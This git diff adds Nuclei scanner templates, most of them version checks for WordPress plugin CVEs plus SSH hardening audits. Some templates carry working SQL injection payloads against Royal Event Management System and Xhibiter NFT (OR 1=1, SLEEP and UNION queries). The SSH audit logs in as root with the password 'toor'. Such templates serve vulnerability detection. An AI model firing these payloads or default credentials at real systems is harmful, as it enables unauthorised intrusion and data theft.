100644 index 0000000000..368f26b40d --- /dev/null +++ b/poc/sql/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10360-45e78583db6193210a4d94e69731df68 + +info: + name: > + Move Addons for Elementor <= 1.3.5 - Authenticated (Contributor+) Sensitive Information Exposure via Elementor Templates + author: topscoder + severity: low + description: > + The Move Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.5 via the render function in includes/widgets/accordion/widget.php, includes/widgets/remote-template/widget.php, and other widget.php files. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/eafe73b4-b492-45c7-adca-d9a3042144b4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10360 + metadata: + fofa-query: "wp-content/plugins/move-addons/" + google-query: inurl:"/wp-content/plugins/move-addons/" + shodan-query: 'vuln:CVE-2024-10360' + tags: cve,wordpress,wp-plugin,move-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/move-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "move-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.5') \ No newline at end of file diff --git a/poc/sql/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml b/poc/sql/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml new file mode 100644 index 0000000000..a940612774 --- /dev/null +++ b/poc/sql/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937 + +info: + name: > + FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The FileOrganizer – Manage WordPress and Website Files plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the "fileorganizer_ajax_handler" function in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, and permissions granted by an administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible. NOTE: The FileOrganizer Pro plugin must be installed and active to allow Subscriber+ users to upload files. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f79164c2-be3b-496d-b747-3e4b60b7fc2b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.5 + cve-id: CVE-2024-7985 + metadata: + fofa-query: "wp-content/plugins/fileorganizer/" + google-query: inurl:"/wp-content/plugins/fileorganizer/" + shodan-query: 'vuln:CVE-2024-7985' + tags: cve,wordpress,wp-plugin,fileorganizer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fileorganizer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fileorganizer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.9') \ No newline at end of file diff --git a/poc/sql/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml b/poc/sql/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml new file mode 100644 index 0000000000..a28570e900 --- /dev/null +++ b/poc/sql/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952 + +info: + name: > + Kata Plus – Addons for Elementor – Widgets, Extensions and Templates <= 1.4.7 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Kata Plus – Addons for Elementor – Widgets, Extensions and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/05c7267e-2e0c-48e9-bdaa-c8bc0b9ec8a6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9376 + metadata: + fofa-query: "wp-content/plugins/kata-plus/" + google-query: inurl:"/wp-content/plugins/kata-plus/" + shodan-query: 'vuln:CVE-2024-9376' + tags: cve,wordpress,wp-plugin,kata-plus,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kata-plus/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kata-plus" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.7') \ No newline at end of file diff --git a/poc/sql/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml b/poc/sql/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml new file mode 100644 index 0000000000..4bed1d573a --- /dev/null +++ b/poc/sql/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca + +info: + name: > + Beaver Builder – WordPress Page Builder <= 2.8.4.2 - Authenticated (Contributor+) Stored DOM-Based Cross-Site Scripting via Button Widget + author: topscoder + severity: low + description: > + The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button widget in all versions up to, and including, 2.8.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7cfab048-efc6-4c7c-a1bd-0a9daf8779bc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9505 + metadata: + fofa-query: "wp-content/plugins/beaver-builder-lite-version/" + google-query: inurl:"/wp-content/plugins/beaver-builder-lite-version/" + shodan-query: 'vuln:CVE-2024-9505' + tags: cve,wordpress,wp-plugin,beaver-builder-lite-version,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/beaver-builder-lite-version/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "beaver-builder-lite-version" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.4.2') \ No newline at end of file diff --git a/poc/sql/cf7-telegram-92fb3b1b9f8249665fe2a2df5db85b7a.yaml b/poc/sql/cf7-telegram-92fb3b1b9f8249665fe2a2df5db85b7a.yaml new file mode 100644 index 0000000000..bc6996c365 --- /dev/null +++ b/poc/sql/cf7-telegram-92fb3b1b9f8249665fe2a2df5db85b7a.yaml @@ -0,0 +1,59 @@ +id: cf7-telegram-92fb3b1b9f8249665fe2a2df5db85b7a + +info: + name: > + Contact Form 7 + Telegram <= 0.8.5 - Missing Authorization to Authenticated (Subscriber+) Subscription Approve/Pause/Refuse + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f330fa5a-b471-45ee-a2a6-3ae8f3941bfe?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cf7-telegram/" + google-query: inurl:"/wp-content/plugins/cf7-telegram/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cf7-telegram,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cf7-telegram/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cf7-telegram" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8.5') \ No newline at end of file diff --git a/poc/sql/move-addons-e750f1bb05d811fe0e3f213b39e81dbd.yaml b/poc/sql/move-addons-e750f1bb05d811fe0e3f213b39e81dbd.yaml new file mode 100644 index 0000000000..555227e3be --- /dev/null +++ b/poc/sql/move-addons-e750f1bb05d811fe0e3f213b39e81dbd.yaml @@ -0,0 +1,59 @@ +id: move-addons-e750f1bb05d811fe0e3f213b39e81dbd + +info: + name: > + Move Addons for Elementor <= 1.3.5 - Authenticated (Contributor+) Sensitive Information Exposure via Elementor Templates + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/eafe73b4-b492-45c7-adca-d9a3042144b4?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/move-addons/" + google-query: inurl:"/wp-content/plugins/move-addons/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,move-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/move-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "move-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.5') \ No newline at end of file diff --git a/poc/sql/royal-event-management-system-sqli.yaml b/poc/sql/royal-event-management-system-sqli.yaml new file mode 100644 index 0000000000..b1358ef078 --- /dev/null +++ b/poc/sql/royal-event-management-system-sqli.yaml @@ -0,0 +1,67 @@ +id: royal-event-management-system-sqli + +info: + name: Royal Event Management System 1.0 - 'todate' SQL Injection + author: eren-gozaydin + severity: high + description: Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in /royal_event/btndates_report.php#?=. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + reference: + - https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-28080 + metadata: + version: 1 + tested-on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 + tags: cve,cve2022,sqli,royal-event,authenticated + +requests: + - method: POST + path: + - "{{BaseURL}}/royal_event/btndates_report.php#?=" + headers: + Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Encoding: gzip, deflate + Accept-Language: en-us,en;q=0.5 + Cache-Control: no-cache + Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380 + Referer: "{{BaseURL}}/royal_event/btndates_report.php#?=" + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 + body: | + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="todate" + + -1' OR 1=1 OR 'ns'='ns + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="search" + + 3 + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="fromdate" + + 01/01/2011 + --f289a6438bcc45179bcd3eb7ddc555d0-- + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "SQL syntax" + - "MySQL" + condition: or + - type: word + words: + - "Event Details Report" + part: body + + extractors: + - type: regex + part: body + regex: + - "(?i)(sql syntax|mysql syntax|unexpected token)" \ No newline at end of file diff --git a/poc/sql/xhibiter-nft-sqli.yaml b/poc/sql/xhibiter-nft-sqli.yaml new file mode 100644 index 0000000000..d788460ea0 --- /dev/null +++ b/poc/sql/xhibiter-nft-sqli.yaml @@ -0,0 +1,52 @@ +id: xhibiter-nft-sqli + +info: + name: Xhibiter NFT Marketplace SQL Injection + author: ProjectDiscoveryAI + severity: high + description: | + Xhibiter NFT Marketplace suffers from SQL Injection vulnerability in the 'id' parameter. + The vulnerability allows attackers to execute various types of SQL injection attacks including + boolean-based blind, time-based blind, and UNION query injections. + +http: + - raw: + - | + GET /collections?id=2' AND 4182=4182 AND 'rNfD'='rNfD HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "4182=4182" + part: body + - type: word + words: + - "rNfD=rNfD" + part: body + + - raw: + - | + GET /collections?id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "duration > 5" + + - raw: + - | + GET /collections?id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "qbbbq" + - "eTeuLPRMhOvIDCDXbNNYlaKmJVeIViFmKpCbfkX" + part: body \ No newline at end of file diff --git a/poc/sql_injection/royal-event-management-system-sqli.yaml b/poc/sql_injection/royal-event-management-system-sqli.yaml new file mode 100644 index 0000000000..b1358ef078 --- /dev/null +++ b/poc/sql_injection/royal-event-management-system-sqli.yaml @@ -0,0 +1,67 @@ +id: royal-event-management-system-sqli + +info: + name: Royal Event Management System 1.0 - 'todate' SQL Injection + author: eren-gozaydin + severity: high + description: Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in /royal_event/btndates_report.php#?=. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + reference: + - https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-28080 + metadata: + version: 1 + tested-on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 + tags: cve,cve2022,sqli,royal-event,authenticated + +requests: + - method: POST + path: + - "{{BaseURL}}/royal_event/btndates_report.php#?=" + headers: + Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Encoding: gzip, deflate + Accept-Language: en-us,en;q=0.5 + Cache-Control: no-cache + Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380 + Referer: "{{BaseURL}}/royal_event/btndates_report.php#?=" + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 + body: | + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="todate" + + -1' OR 1=1 OR 'ns'='ns + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="search" + + 3 + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="fromdate" + + 01/01/2011 + --f289a6438bcc45179bcd3eb7ddc555d0-- + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "SQL syntax" + - "MySQL" + condition: or + - type: word + words: + - "Event Details Report" + part: body + + extractors: + - type: regex + part: body + regex: + - "(?i)(sql syntax|mysql syntax|unexpected token)" \ No newline at end of file diff --git a/poc/sql_injection/xhibiter-nft-sqli.yaml b/poc/sql_injection/xhibiter-nft-sqli.yaml new file mode 100644 index 0000000000..d788460ea0 --- /dev/null +++ b/poc/sql_injection/xhibiter-nft-sqli.yaml @@ -0,0 +1,52 @@ +id: xhibiter-nft-sqli + +info: + name: Xhibiter NFT Marketplace SQL Injection + author: ProjectDiscoveryAI + severity: high + description: | + Xhibiter NFT Marketplace suffers from SQL Injection vulnerability in the 'id' parameter. + The vulnerability allows attackers to execute various types of SQL injection attacks including + boolean-based blind, time-based blind, and UNION query injections. + +http: + - raw: + - | + GET /collections?id=2' AND 4182=4182 AND 'rNfD'='rNfD HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "4182=4182" + part: body + - type: word + words: + - "rNfD=rNfD" + part: body + + - raw: + - | + GET /collections?id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "duration > 5" + + - raw: + - | + GET /collections?id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "qbbbq" + - "eTeuLPRMhOvIDCDXbNNYlaKmJVeIViFmKpCbfkX" + part: body \ No newline at end of file diff --git a/poc/ssh/disable-ssh-forwarding.yaml b/poc/ssh/disable-ssh-forwarding.yaml new file mode 100644 index 0000000000..71a2693b6e --- /dev/null +++ b/poc/ssh/disable-ssh-forwarding.yaml @@ -0,0 +1,24 @@ +id: disable-ssh-forwarding + +info: + name: Disable SSH Forwarding + author: pussycat0x + severity: info + description: | + Port forwarding enables a host to proxy for another, which is often unnecessary and can pose security risks. If your server has a GUI, disable X11 forwarding when using SSH, as it wasn't designed with security in mind. + remediation: | + Change it to : X11Forwarding no and AllowTcpForwarding no + reference: + - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f + tags: audit,config,file,ssh + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "AllowTcpForwarding yes" + - "X11Forwarding yes" + condition: or diff --git a/poc/ssh/disable-ssh-protocol-1.yaml b/poc/ssh/disable-ssh-protocol-1.yaml new file mode 100644 index 0000000000..eee1c591a9 --- /dev/null +++ b/poc/ssh/disable-ssh-protocol-1.yaml @@ -0,0 +1,24 @@ +id: disable-ssh-protocol-1 + +info: + name: Disable SSH Protocol 1 + author: pussycat0x + severity: info + description: | + SSH Protocol 1 is outdated and less secure. Ensure only Protocol 2 is used. + remediation: | + Ensure the following line is present: : Protocol 2 + reference: + - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f + - https://www.ktchost.com/blog/enable-ssh-protocol-2/ + tags: audit,config,file,ssh + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "Protocol 2" + negative: true \ No newline at end of file diff --git a/poc/ssh/enable-ssh-privilege-separation.yaml b/poc/ssh/enable-ssh-privilege-separation.yaml new file mode 100644 index 0000000000..948c61dff1 --- /dev/null +++ b/poc/ssh/enable-ssh-privilege-separation.yaml @@ -0,0 +1,24 @@ +id: enable-ssh-privilege-separation + +info: + name: Enable Privilege Separation in SSH + author: pussycat0x + severity: info + description: | + Limits the impact of a compromise by isolating critical operations from less sensitive tasks. + remediation: | + Change it to : UsePrivilegeSeparation yes + reference: + - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f + - https://www.stigviewer.com/stig/red_hat_enterprise_linux_9/2023-09-13/finding/V-258010 + tags: audit,config,file,ssh + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "UsePrivilegeSeparation yes" + negative: true \ No newline at end of file diff --git a/poc/ssh/limit-ssh-group.yaml b/poc/ssh/limit-ssh-group.yaml new file mode 100644 index 0000000000..cdbc4664a0 --- /dev/null +++ b/poc/ssh/limit-ssh-group.yaml @@ -0,0 +1,24 @@ +id: limit-ssh-group + +info: + name: Limit SSH Users Group Access + author: pussycat0x + severity: info + description: | + Limit SSH access to specific users. + remediation: | + Change it to : AllowUsers user1 user2 + reference: + - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f + - https://cloud.ibm.com/docs/ssh-keys?topic=ssh-keys-granting-ssh-access-to-a-user + tags: audit,config,file,ssh + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "AllowGroups" + negative: true \ No newline at end of file diff --git a/poc/ssh/limit-ssh-users-access.yaml b/poc/ssh/limit-ssh-users-access.yaml new file mode 100644 index 0000000000..6ad6944932 --- /dev/null +++ b/poc/ssh/limit-ssh-users-access.yaml @@ -0,0 +1,24 @@ +id: limit-ssh-users-access + +info: + name: Limit SSH Users Access + author: pussycat0x + severity: info + description: | + Limit SSH access to specific users. + remediation: | + Change it to : AllowUsers user1 user2 + reference: + - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f + - https://cloud.ibm.com/docs/ssh-keys?topic=ssh-keys-granting-ssh-access-to-a-user + tags: audit,config,file,ssh + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "AllowUsers" + negative: true \ No newline at end of file diff --git a/poc/ssh/ssh-audit.yaml b/poc/ssh/ssh-audit.yaml new file mode 100644 index 0000000000..04edf1db40 --- /dev/null +++ b/poc/ssh/ssh-audit.yaml @@ -0,0 +1,80 @@ +id: ssh-audit + +info: + name: SSH - Audit + author: pussycat0x + severity: unknown + description: | + SSH (Secure Shell) is a critical tool for administering Linux servers remotely. However, its powerful capabilities also make it a prime target for attackers. SSH hardening refers to the process of strengthening SSH configuration and practices to protect against unauthorized access and potential security breaches. + reference: + - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f + - https://github.com/projectdiscovery/nuclei-templates/tree/main/file/audit/ssh + tags: js,ssh,audit,network + +javascript: + - code: | + var m = require("nuclei/ssh"); + var c = m.SSHClient(); + c.Connect(Host,Port,Username,Password); + const sshConfig = c.Run('cat /etc/ssh/sshd_config') + sshConfig + + let result = ""; + if (sshConfig.includes('#Port 22') && !sshConfig.includes('Port ')) { + result += "Default SSH Port Detected; "; + } + if (sshConfig.includes('PermitEmptyPasswords yes')) { + result += "Disable SSH Empty Password Access; "; + } + if (sshConfig.includes('PermitRootLogin yes')) { + result += "Disable SSH Root Login; "; + } + if (sshConfig.includes('AllowTcpForwarding yes') && !sshConfig.includes('#AllowTcpForwarding yes') || sshConfig.includes('X11Forwarding yes')) { + result += "Disable SSH Forwarding; "; + } + if (!sshConfig.includes('Protocol 2')) { + result += "Disable SSH Protocol 1; "; + } + if (!sshConfig.includes('UsePrivilegeSeparation yes')) { + result += "Enable Privilege Separation in SSH; "; + } + if (!sshConfig.includes('PrintLastLog no')) { + result += "Hide SSH Last Login Information; "; + } + if (sshConfig.includes('#ClientAliveInterval') && sshConfig.includes('#ClientAliveCountMax') && !sshConfig.includes('ClientAliveInterval ') && !sshConfig.includes('ClientAliveCountMax ')){ + result += "Set SSH Idle Timeout Interval; "; + } + if (sshConfig.includes('#MaxAuthTries') && !sshConfig.includes('MaxAuthTries ')){ + result += "Set Maximum Limit SSH Authentication Attempts; "; + } + if (!sshConfig.includes('AllowGroups')){ + result += "Set or Limit SSH Users Group Access; "; + } + if (!sshConfig.includes('AllowUsers')){ + result += "Set or Limit SSH Users Access; "; + } + if (sshConfig.includes('#ListenAddress') && !sshConfig.includes('ListenAddress ')){ + result += "Limit SSH Access by IP Address / Whitelist IP; "; + } + if (sshConfig.includes('#PasswordAuthentication yes') && !sshConfig.includes('PasswordAuthentication yes')){ + result += "Setup/Use SSH Key-Based Authentication; "; + } + + result + + args: + Host: "{{Host}}" + Port: "22" + Username: "root" + Password: "toor" + + + matchers: + - type: dsl + dsl: + - "success == true" + + extractors: + - type: dsl + dsl: + - response diff --git a/poc/ssh/ssh-ip-whitelist.yaml b/poc/ssh/ssh-ip-whitelist.yaml new file mode 100644 index 0000000000..cebf589dea --- /dev/null +++ b/poc/ssh/ssh-ip-whitelist.yaml @@ -0,0 +1,23 @@ +id: ssh-ip-whitelist + +info: + name: Limit SSH Access by IP Address + author: pussycat0x + severity: info + description: | + Only specified IP addresses will be able to connect via SSH, reducing the risk of unauthorized access and it's Helps in mitigating brute-force attacks by limiting the attack surface + remediation: | + Change it to : ListenAddress 0.0.0.0 + reference: + - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f + - https://www.cyberciti.biz/tips/howto-openssh-sshd-listen-multiple-ip-address.html + tags: audit,config,file,ssh + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "#ListenAddress" \ No newline at end of file diff --git a/poc/ssh/ssh-key-auth-required.yaml b/poc/ssh/ssh-key-auth-required.yaml new file mode 100644 index 0000000000..61496daad8 --- /dev/null +++ b/poc/ssh/ssh-key-auth-required.yaml @@ -0,0 +1,23 @@ +id: ssh-key-auth-required + +info: + name: Use SSH Key-Based Authentication + author: pussycat0x + severity: info + description: | + SSH key-based authentication is more secure than password-based authentication. + remediation: | + Change it to : PasswordAuthentication no + reference: + - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f + - https://www.digitalocean.com/community/tutorials/how-to-configure-ssh-key-based-authentication-on-a-linux-server + tags: audit,config,file,ssh + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "PasswordAuthentication yes" diff --git a/poc/web/webui-login.yaml b/poc/web/webui-login.yaml new file mode 100644 index 0000000000..6f3339ee58 --- /dev/null +++ b/poc/web/webui-login.yaml @@ -0,0 +1,25 @@ +id: webui-login +info: + name: Web UI Login Page Detection + author: drewvravick + severity: high + description: | + Detects the presence of a web UI login page. + tags: + - web + - login + +requests: + - name: Web UI Login Page + path: + - "{{BaseURL}}/webui/" + method: GET + matchers-condition: and + matchers: + - type: word + part: body + words: + - "cisco" + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/wordpress/wpc-smart-messages-504d2223497cf2c2514151c40b405179.yaml b/poc/wordpress/wpc-smart-messages-504d2223497cf2c2514151c40b405179.yaml new file mode 100644 index 0000000000..ccd04cedeb --- /dev/null +++ b/poc/wordpress/wpc-smart-messages-504d2223497cf2c2514151c40b405179.yaml @@ -0,0 +1,59 @@ +id: wpc-smart-messages-504d2223497cf2c2514151c40b405179 + +info: + name: > + WPC Smart Messages for WooCommerce <= 4.2.1 - Authenticated (Subscriber+) Local File Inclusion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0fd87512-def0-4e59-aa2d-b166919474f3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wpc-smart-messages/" + google-query: inurl:"/wp-content/plugins/wpc-smart-messages/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wpc-smart-messages,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpc-smart-messages/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpc-smart-messages" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.1') \ No newline at end of file diff --git a/poc/wordpress/wpc-smart-messages-bd63fbb32b56e3848c8cdcc2c3f2fd2f.yaml b/poc/wordpress/wpc-smart-messages-bd63fbb32b56e3848c8cdcc2c3f2fd2f.yaml new file mode 100644 index 0000000000..02ffea1558 --- /dev/null +++ b/poc/wordpress/wpc-smart-messages-bd63fbb32b56e3848c8cdcc2c3f2fd2f.yaml @@ -0,0 +1,59 @@ +id: wpc-smart-messages-bd63fbb32b56e3848c8cdcc2c3f2fd2f + +info: + name: > + WPC Smart Messages for WooCommerce <= 4.2.1 - Missing Authorization to Authenticated (Subscriber+) Message Activation/Deactivation + author: topscoder + severity: low + description: > + + 